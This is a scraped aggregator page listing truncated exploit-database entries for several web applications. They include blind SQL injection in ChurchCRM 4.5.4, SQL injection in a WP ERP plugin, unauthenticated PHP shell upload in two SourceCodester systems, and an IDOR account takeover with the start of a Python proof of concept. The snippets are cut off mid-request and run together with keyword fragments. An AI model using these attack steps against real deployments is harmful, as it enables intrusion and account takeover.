comparemela.com

Exploit Title News Today : Breaking News, Live Updates & Top Stories | Vimarsana

ChurchCRM 4 5 4 SQL Injection - KizzMyAnthia com

# Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN tyid# Date: 03-05-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.4# Tested on: Windows, Linux# CVE: CVE-2023-29842"""The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN tyid POST parameter.This endpoint can be triggered through the

Software linkExploit titleAuthenticated blindExploit authorBlog postVendor homepageList event typesEdit event typesBlind auth

WordPress WP ERP 1 12 2 SQL Injection - KizzMyAnthia com

# Exploit Title: WP Plugins WP ERP

Software linkExploit titleExploit authorVendor homepageEnterprise resource planning

Zoo Management System 1 0 Shell Upload - KizzMyAnthia com

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE# Date: 16.10.2023# Exploit Author: Çağatay Ceyhan# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google vignette# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database# Version: 1.0# Tested on: Windows 11## Unauthenticated users can access /zoomanagementsystem/admin/public html/save animal address and they can upload malicious php file instead of animal picture image without any authentication.POST /zoomanagementsystem/admin/public html/save animal HTTP/1.1Host: localhostContent-Length: 6162Cache-Control: max-age=0sec-ch-ua: "Chromium";v="117",

Software linkExploit titleZoo management systemExploit authorVendor homepage

Clinic s Patient Management System 1 0 Shell Upload

# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE# Date: 07.10.2023# Exploit Author: Oğulcan Hami Gül# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code# Version: 1.0# Tested on: Windows 10## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.curl -i -s -k -X

Software linkExploit titlePatient management systemExploit authorVendor homepage

Lost And Found Information System 1 0 Insecure Direct Object Reference

# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over # Date: 2023-12-03# Exploit Author: OR4NG.M4N# Category : webapps# CVE : CVE-2023-38965Python p0c :import argparseimport requestsimport timeparser = argparse.ArgumentParser(description='Send a POST request to the target server')parser.add argument('-url', help='URL of the target', required=True)parser.add argument('-user', help='Username', required=True)parser.add argument('-password', help='Password', required=True)args = parser.parse args()url = args.url

Exploit titleFound information systemAccount takeExploit author

vimarsana © 2020. All Rights Reserved.